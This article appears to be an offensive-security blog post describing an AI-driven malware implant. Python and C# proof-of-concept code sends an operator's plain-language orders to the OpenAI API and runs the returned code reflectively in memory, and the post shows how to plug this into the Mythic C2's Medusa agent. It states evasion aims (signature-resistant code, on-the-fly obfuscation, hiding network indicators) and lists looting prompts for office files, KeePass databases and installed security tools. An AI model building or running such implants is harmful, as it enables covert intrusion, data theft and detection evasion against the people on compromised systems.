TL;DR

Introducing malware agents (implants) that use AI to generate and execute code. Operators can now simply “talk” to their implants, and they will magically execute the requested instructions. For example, an operator could say: “Scan every user’s home folder and pack any office file under 2MB inside a single archive located in C:/test/output.zip”, and the implant would obey. 
This has several advantages:
 

  • Having a more personalized and intuitive way to conduct offensive operations; 
  • Generating unique code each time, which is more difficult to create signatures for; 
  • Eliminating the development effort that would otherwise be required for simple tasks; 
  • Adding optional AI-based code obfuscation on the fly. 

The code discussed in this article can be found here. 

 

High-level Introduction 

The cybersecurity industry is currently pushing artificial intelligence into every part of the defensive landscape to make life easier for analysts, incident responders, and defenders alike. This shift has become a major advantage for the blue team, since it dramatically reduces the effort and skill required for day-to-day operations. 
The same frame of mind can be applied to offensive security, but many of the tool sets available to operators lacked this edge, until now. I will attempt to integrate AI into a particular type of malware: implants. This type of malware is specifically designed to control a system remotely, as covertly as possible.
 

 

Technical Introduction 

During the lifecycle of an agent/implant, we frequently find ourselves having to develop new commands to adapt to a given operational need.
Certain capabilities, such as Beacon Object File (BOF) execution and reflective execution of .NET assemblies or unmanaged PEs, have made it possible to centralize execution capacity and externalize command development. However, this requires the corresponding loader to be embedded in the implant (a COFF loader, for example), which can increase the level of detection depending on the implementation.
Some C2s, such as Mythic, allow their implants to load commands dynamically, so they don’t have to be embedded beforehand. For example, Mythic’s Python agent “Medusa” from the excellent @ajpc500 features this ability to load external commands via the load command.
However, the number of available commands in the Medusa agent is limited, so the operator is required to add new commands depending on current operational needs, such as probing a TCP port or retrieving a file from a URL.
What if you could directly “talk” to your implant, so that the command could be “coded” on the fly, without having to be developed beforehand?

 

Proof of Concept 

To get started, let’s create two PoCs in languages commonly used in offensive contexts. The PoCs can later be integrated into Mythic’s Medusa (Python) and Apollo (C#) implants. 
For our proof of concept, we’re going to create a program (in both languages) that performs the following workflow:
 

[Get the prompt from the user] 
[Build the full prompt with additional details and constraints] 
[Ask the AI through its API to generate code] 
[Sanitize the output] 
[Verify that the code is syntactically valid] 
[Reflectively execute the generated code] 
[Print the output to stdout]

 

This can be summarized by the following diagram: 

 

Prompt template 

The program embeds a prompt template from which it builds the final prompt based on user input.
Here is the Python version of the prompt template:
 

I am going to give you an order, and you will answer only by using python code.
For example, if I ask you to list a system folder, you will write python code that lists the system folder and prints the output.    
Constraints:
- The python code will be running on a {platform.system()} system
- Always print the result if there is one. If your result is a list, print every element, one by line.
- Use only native python modules (no pip install)
The order is: [insert user prompt here]

Note: The prompt dynamically retrieves the OS type it’s running on via platform.system(), so that the generated code can seamlessly adapt to the system context. For example, being on Windows allows the model to make extensive use of ctypes to interact with the WinAPI and avoid shelling out to system commands. 
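
The prompt-building step itself is plain string formatting; here is a minimal sketch of how the template above might be assembled (build_prompt is a hypothetical helper, not part of the original code):

import platform

def build_prompt(user_order):
    # Hypothetical helper: fills the template with the OS type and the operator's order
    return (
        "I am going to give you an order, and you will answer only by using python code.\n"
        "For example, if I ask you to list a system folder, you will write python code "
        "that lists the system folder and prints the output.\n"
        "Constraints:\n"
        f"- The python code will be running on a {platform.system()} system\n"
        "- Always print the result if there is one. If your result is a list, "
        "print every element, one by line.\n"
        "- Use only native python modules (no pip install)\n"
        f"The order is: {user_order}"
    )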

 

Python Version 

The following Python code implements the workflow described above:

import os, sys, ast, json, platform, http.client

# Argument handling
# [redacted for simplicity]

# Define base prompt
# [redacted for simplicity]

# OpenAI API host and endpoint
HOST = "api.openai.com"
ENDPOINT = "/v1/chat/completions"
MODEL = "gpt-4o-mini" # cheap and efficient model
API_KEY = "[API key here]"

# Function to send a request to OpenAI API
def send_prompt(prompt, model=MODEL):
    # Prepare request data
    headers = {
        "Content-Type": "application/json",
        "Authorization": f"Bearer {API_KEY}"
    }
    payload = json.dumps({
        "model": model,
        "messages": [{"role": "user", "content": prompt}],
        "temperature": 0.2  # low temperature for straight answer, less halucination, better for coding
    })

    # Establish connection and send request
    conn = http.client.HTTPSConnection(HOST)
    conn.request("POST", ENDPOINT, body=payload, headers=headers)

    # Get response (read the body once, since it can only be consumed once)
    response = conn.getresponse()
    data = response.read().decode()
    conn.close()
    if response.status != 200:
        print(f"Error: Received status code {response.status}")
        print(data)
        return str() # code will be verified later before execution

    # Return generated code 
    if data:
        response_json = json.loads(data)
        return response_json["choices"][0]["message"]["content"]
    else: 
        return str() # code will be verified later before execution
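
The sanitization and syntax-verification steps of the workflow are redacted above for simplicity; here is a minimal sketch of what they might look like, assuming the model sometimes wraps its answer in markdown code fences (sanitize_output and run_generated are hypothetical helpers):

import ast

def sanitize_output(generated):
    # Hypothetical: strip the markdown code fences the model often wraps code in
    lines = generated.strip().splitlines()
    if lines and lines[0].startswith("```"):
        lines = lines[1:]
    if lines and lines[-1].startswith("```"):
        lines = lines[:-1]
    return "\n".join(lines)

def run_generated(generated):
    code = sanitize_output(generated)
    try:
        ast.parse(code)  # verify the code is syntactically valid before executing
    except SyntaxError as e:
        print(f"Invalid code generated: {e}")
        return
    exec(code)  # reflective execution: the generated code never touches the disk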

Demo 

Issuing some prompts on a Linux system. 

The full code can be found here. 

 

C# Version 

The C# version was a little more complex, as it needed to achieve in-process reflective compilation and execution. 
Note: In this context, “in-process” means that the execution stays in the current process and does not spawn any (sub)process, and “reflective” means compiling/executing code from a byte array in memory, without touching the disk. 
Points worth mentioning:
 

  • The (reflective) compilation is done using the Microsoft Roslyn API; 
  • The (reflective) execution is done with Assembly.Load (this could be done better). 
// [imports, redacted for simplicity]

namespace RoslynCompileAndExecute
{
    class Program
    {
        static string SanitizeSourceCode(string sourceCode)
        {
            // [function code redacted for simplicity]
        }

        // Main
        static void Main(string[] args)
        {

            // Argument handling
            // [redacted for simplicity]

            // Build the main prompt
            // [redacted for simplicity]

            // Configure ChatGPT request (set your API key here)
            string apiKey = "[redacted]"; 
            string url = "https://api.openai.com/v1/chat/completions";
            string jsonRequestBody = $@"{{
                ""model"": ""gpt-4o-mini"",
                ""temperature"": 0.2,
                ""messages"": [
                    {{ ""role"": ""user"", ""content"": ""{escapedprompt}"" }}
                ]
            }}";

            // Create the HTTP request 
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
            request.Method = "POST";
            request.ContentType = "application/json";
            request.Headers["Authorization"] = "Bearer " + apiKey;

            // Write the request body
            using (var streamWriter = new StreamWriter(request.GetRequestStream()))
            {
                streamWriter.Write(jsonRequestBody);
                streamWriter.Flush();
            }

            // Get and read the response
            string responseContent;
            using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
            {
                using (var streamReader = new StreamReader(response.GetResponseStream()))
                {
                    responseContent = streamReader.ReadToEnd();
                }
            }

            // Deserialize the JSON response to extract the generated code
            ChatCompletionResponse chatResponse;
            using (var ms = new MemoryStream(System.Text.Encoding.UTF8.GetBytes(responseContent)))
            {
                var serializer = new DataContractJsonSerializer(typeof(ChatCompletionResponse));
                chatResponse = (ChatCompletionResponse)serializer.ReadObject(ms);
            }

            // The generated C# code 
            string sourceCode = chatResponse.Choices[0].Message.Content;

            // Sanitize the source code
            sourceCode = SanitizeSourceCode(sourceCode);

            // Parse the source code into a syntax tree
            SyntaxTree syntaxTree = CSharpSyntaxTree.ParseText(sourceCode);

            // Prepare references required for compilation.
            string assemblyPath = Path.GetDirectoryName(typeof(object).Assembly.Location);
            var references = new List<MetadataReference>()
            {
                // [redacted for simplicity]
            };

            // Create a Roslyn compilation for a dynamically linked library
            CSharpCompilation compilation = CSharpCompilation.Create(
                "DynamicAssembly",
                new[] { syntaxTree },
                references,
                new CSharpCompilationOptions(OutputKind.DynamicallyLinkedLibrary));

            // Emit the compiled assembly to a MemoryStream (our byte buffer)
            using (var ms = new MemoryStream())
            {
                EmitResult result = compilation.Emit(ms);
                if (!result.Success)
                {
                    foreach (Diagnostic diagnostic in result.Diagnostics)
                    {
                        // If there are compilation errors, output them and exit.
                        Console.Error.WriteLine(diagnostic.ToString());
                    }
                    return;
                }

                // Get the compiled assembly as a byte array.
                byte[] assemblyBytes = ms.ToArray();

                // Load the assembly from the byte array using reflection.
                Assembly assembly = Assembly.Load(assemblyBytes);

                // Find the type and method to execute.
                Type dynamicType = assembly.GetType("DynamicProgram");
                MethodInfo executeMethod = dynamicType?.GetMethod("Execute", BindingFlags.Public | BindingFlags.Static);
                if (executeMethod != null)
                {
                    // Execute method
                    executeMethod.Invoke(null, null);
                }
                else
                {
                    Console.Error.WriteLine("Method 'Execute' not found");
                }
            }
        }
    }
}

Demo 

Listing files of a directory. 

Spawning mspaint.exe in a detached process. 

The full code can be found here. 

 

Integrating the prompt Command in Mythic’s Medusa Agent 

To add a command named “prompt” to a Medusa implant, one needs to add the following files:  

  • The implant-side code:
    [Mythic folder]/InstalledServices/medusa/medusa/agent_code/prompt.py 
  • The server-side code:
    [Mythic folder]/InstalledServices/medusa/medusa/mythic/agent_functions/prompt.py 

Note: If you wish to create a new command from scratch, you can start by copying cat.py from those folders to have basic working code. 

Once you are finished editing your code, restart the Medusa container:
[Mythic folder]/mythic-cli restart medusa


Check the logs to see if any errors occurred:
[Mythic folder]/mythic-cli logs medusa


From the running implant, simply run:
  load prompt 

Note: When developing the code for a command, there’s no need to unload and then load the command to reload the code; simply run load again. 

 

Command Design 

First, we’re going to improve our communication model: 

 

Advantages of this model (C2 <-> API) compared to the previous PoC (implant <-> API):

  • The API key cannot be recovered from the implant code (in case of artifact compromise); 
  • The API domain cannot be used as a network indicator. For example, it would be strange for a system process to communicate with api.openai.com (when it is not supposed to); 
  • More practical for development and for working on offline Windows VMs, since the C2 is the one making network requests to the API. 

 

Command’s Options 

  • model: Being able to choose the GPT model that will generate the code. 
  • cmdless: Prevents the generated code from issuing system/shell commands or spawning (sub)processes. This adds the following constraint to the main prompt: “Do not use any system shell command, or any local system executables”. 
  • obfuscation: Allows on-the-fly obfuscation of the defined function/class/variable names. This adds the following constraint to the main prompt: “For any variable or function or class, or object you define, name it by using words that are fruit, animal, or plant. Make sure to use words without any special characters”. 

Options available when running the prompt command
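
Putting the communication model together with these options, here is a heavily simplified, hypothetical sketch of the server-side logic (the actual Mythic agent_functions API differs; build_prompt, send_prompt, and sanitize_output are the helpers sketched earlier):

def handle_prompt_task(task_args):
    # The C2, not the implant, talks to the OpenAI API
    full_prompt = build_prompt(task_args["prompt"])
    if task_args.get("cmdless"):
        full_prompt += "\n- Do not use any system shell command, or any local system executables"
    if task_args.get("obfuscation"):
        full_prompt += ("\n- For any variable or function or class, or object you define, "
                        "name it by using words that are fruit, animal, or plant. "
                        "Make sure to use words without any special characters")
    generated = send_prompt(full_prompt, model=task_args.get("model", MODEL))
    # Replace the prompt argument with the generated code before tasking the implant
    task_args["prompt"] = sanitize_output(generated)
    return task_args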

 

Medusa Constraints 

My initial implementation of Python code execution, using the native exec function, mixed with the way Medusa works, produced improper handling of function and class definitions.
The issue is that when executing Python code in Medusa via the native exec function, the functions/classes defined in the code are unable to retrieve imports/variables/functions/classes that are defined outside their body.
This same execution implementation (with the Python exec function) is used in Medusa’s built-in load_script.py command; I had noticed the issue in the past without understanding why.
For example, if you execute the following code with Medusa’s load_script: 

value1 = 1
def add():
    return value1+1
add()

You would get the following error: 

Error when running a function calling an external variable with load_script. 

What I understood is that it does not work because exec was being given separate dictionaries for globals and locals: functions and classes defined within the executed code look up names only in the global dictionary, while top-level variables were being stored in the local dictionary.
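
This is easy to reproduce outside Medusa; a minimal standalone illustration of the behavior:

code = """
value1 = 1
def add():
    return value1 + 1
print(add())
"""

# With separate global/local dicts, value1 lands in the locals dict,
# but add() resolves names through the globals dict only -> NameError
try:
    exec(code, {}, {})
except NameError as e:
    print(f"Separate dicts: {e}")  # name 'value1' is not defined

# With a single shared dict acting as both globals and locals, it works
ns = {}
exec(code, ns, ns)  # prints 2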
The following code execution implementation circumvents this:
 

# Ensure built-in functions (including __import__) are available
namespace = dict()
namespace['__builtins__'] = __import__('builtins')

# Compile the source code in 'exec' mode
code_obj = compile(generated_code, '', 'exec')

# Use the same dictionary for both globals and locals
eval(code_obj, namespace, namespace)

This approach uses a unified namespace, with the same dictionary serving as both globals and locals, making sure that all definitions, such as variables, modules, and even the built-in functions explicitly added with namespace['__builtins__'] = __import__('builtins'), stay accessible throughout the executed code.   

 

Implant-side Code 

As all the work is delegated server-side (communication with the API and code processing), the implant-side command code is less than 20 lines (excluding comments). In a nutshell, this makes it possible to have an extra-powerful feature with an extra-light code footprint: 

def prompt(self, task_id, prompt, model, cmdless, obfuscation):
    import io, ast, sys

    # prompt has been replaced by generated Python code by the server
    # (this is a solution to send data to the agent from the server)
    generated_code = prompt

    # Verifying (again) that the code is syntactically valid
    try:
        ast.parse(generated_code)
    except Exception as e:
        return f"Execution failed: {e}"

    # Capture stdout to recover the generated code's output
    output_capture = io.StringIO()
    sys.stdout = output_capture

    #exec(generated_code) # OLD
    # Better exec that supports external variables/classes within classes and functions:
    try:
        namespace = dict()
        # Ensure built-in functions (including __import__) are available
        namespace['__builtins__'] = __import__('builtins')
        # Compile the source code in 'exec' mode
        code_obj = compile(generated_code, '', 'exec')
        # Use the same dictionary for both globals and locals
        eval(code_obj, namespace, namespace)
    except Exception as e:
        return f"Execution failed: {e}"
    finally:
        # Always restore stdout, even if the generated code raises (keeps the implant alive)
        sys.stdout = sys.__stdout__

    captured_output = output_capture.getvalue()

    # Display result
    return f"Output:\n\n{captured_output}"

 

Demo 

With that being said, here’s a demo of the prompt command:

The full code can be found here.   

 

Crashsafe Command Handling 

Some code generations may be incorrect. In this case, the error is returned, and the implant remains alive. Here’s an example of the same prompt being submitted twice: the first attempt generates incorrect code that fails, while the second generates valid code that executes: 

Multiple attempts at the same prompt, without risk of crashing the implant. 

 

Pros, Cons and Limitations 

Pros  [+]

  • Having a more personalized and intuitive way to operate. For example, being able to say: “Scan every user’s home folder, and pack any office file under 2MB inside a single archive located in C:/test/output.zip” (this kind of prompt can significantly speed up the loot phase); 
  • Generating unique code each time (more difficult to sign); 
  • No development effort for simple tasks; 
  • Optional AI-based code obfuscation on the fly; 
  • Extra-light implant-side code; 
  • The possibility to include live translation, in the case of operating on a host in a foreign language; 
  • The current implementation of the prompt command in Medusa is crashsafe: if the generated code crashes, the implant remains alive.

Cons  [-]

  • It’s so skid-friendly it terrifies me; 
  • Using an implant with AI capability has a higher ecological impact than a traditional implant. 

Limitations [!]

  • The current limitations of AI itself, although models will continuously improve. At the time of writing, we cannot expect to ask for overly complex operations, or to get elite opsec/stealth code; 
  • There is currently no operator validation before the generated code is executed. It would be nice to be able to pause and edit the code before shooting it; 
  • With models such as gpt-4o, gpt-4o-mini, or o1-mini, each issued command costs approximately between $0.00003 and $0.01 (depending on its input/output complexity) at the time of writing this article (a rough estimate is sketched below). 
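
For a rough sense of where those numbers come from, a back-of-the-envelope sketch (the per-token rates below are illustrative assumptions, not quoted pricing):

# Illustrative cost estimate for one issued command (rates are assumptions)
input_rate  = 0.15 / 1_000_000   # $ per input token (assumed)
output_rate = 0.60 / 1_000_000   # $ per output token (assumed)

prompt_tokens   = 300   # template + constraints + operator order
response_tokens = 200   # generated Python code

cost = prompt_tokens * input_rate + response_tokens * output_rate
print(f"~${cost:.5f} per command")  # on the order of $0.0002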

 

Example of Useful Prompts 

Some tasks that can be long to achieve with standard implant commands (such as ls) while avoiding system/shell commands: 

  • “Enumerate the users who do not have the following folders empty: Desktop, Downloads”. This can be useful when there are many users on a host/share; 
  • “Give me the list of browsers used by each system user by looking at their folders in AppData”; 
  • “List all the security solutions present on the system by looking at the program folders. Quickly describe each security solution observed, by giving a short text about what it is”; 
  • “Crawl the remote share \\test\share to find any keepass file”; 
  • “Fetch this archive at https://… and uncompress it in the C:\test folder”. 

 

Conclusion 

This feature makes it possible to generate personalized code on the fly with no development effort. As security solutions evolve and increasingly adopt AI, malware will follow the same path and integrate intelligence into its core. Although the code provided in this article is only a proof of concept, it is likely that some C2s will incorporate this capability in the future.   

 

Credits 

  • OpenAI’s ChatGPT, which is currently used by the implant in this article, but which also changed my life: https://chatgpt.com  

 

Author

jdi
